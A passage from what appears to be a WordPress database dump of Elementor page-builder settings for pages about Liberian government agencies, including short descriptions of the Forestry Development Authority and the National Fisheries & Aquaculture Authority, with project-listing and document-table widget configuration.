healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6cf88ad\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"epa\\\",\\\"tag_id\\\":\\\"52\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"epa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4b4838c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e6d88a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89a8be2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:epa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8399,1582,'_dp_original','1544'),(8400,1582,'_edit_last','38'),(8403,1584,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8404,1584,'slide_template','default'),(8406,1584,'_elementor_template_type','wp-post'),(8407,1584,'_elementor_version','2.7.5'),(8408,1584,'_wp_page_template','default'),(8409,1584,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c512178\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The MODCSP information coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1a78d5f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"532f56d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f0efc77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a13897\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a4db5a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"38bc81c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"17482a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1ae03a19\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mogcsp\\\",\\\"tag_id\\\":\\\"64\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mogcsp\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7758e3b1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"766d660a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1a4a49d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a94bfb8\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mogcsp\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8411,1584,'_dp_original','1582'),(8412,1584,'_edit_last','38'),(8474,1586,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8475,1586,'slide_template','default'),(8477,1586,'_elementor_template_type','wp-post'),(8478,1586,'_elementor_version','2.7.5'),(8479,1586,'_wp_page_template','default'),(8480,1586,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ef0e5ce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Forestry Development Authority (FDA) is mandated to sustainably manage and conserve all forest resources for the benefit of present and future generation. The National Resource Law and recent National Forestry Reform Law are legal instruments that strengthened its mandate and served as guides for the management of forest resources in Liberia.<\\/p><p>Integrating the 3-Cs approach, FDA works to conserve and sustainably manage forest resources to enable them continue to provision complete range of goods and services for the benefit of all Liberians and also to contribute to the reduction of poverty.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3dbc9ac\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"f919375\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e1d953c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15781ca\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"fda\\\",\\\"tag_id\\\":\\\"53\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"fda\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f10ae8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"7e78c45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1160609\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"573143f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"729b52c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"455a18c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2875b46\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:fda\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(8481,1586,'_dp_original','1584'),(8482,1586,'_edit_last','38'),(8485,1588,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(8486,1588,'slide_template','default'),(8488,1588,'_elementor_template_type','wp-post'),(8489,1588,'_elementor_version','2.7.5'),(8490,1588,'_wp_page_template','default'),(8491,1588,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.<\\/p>\\n<p>The overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db49c3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"793fd76\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e046628\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48352ba\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"nafaa\\\",\\\"tag_id\\\":\\\"65\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"nafaa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a90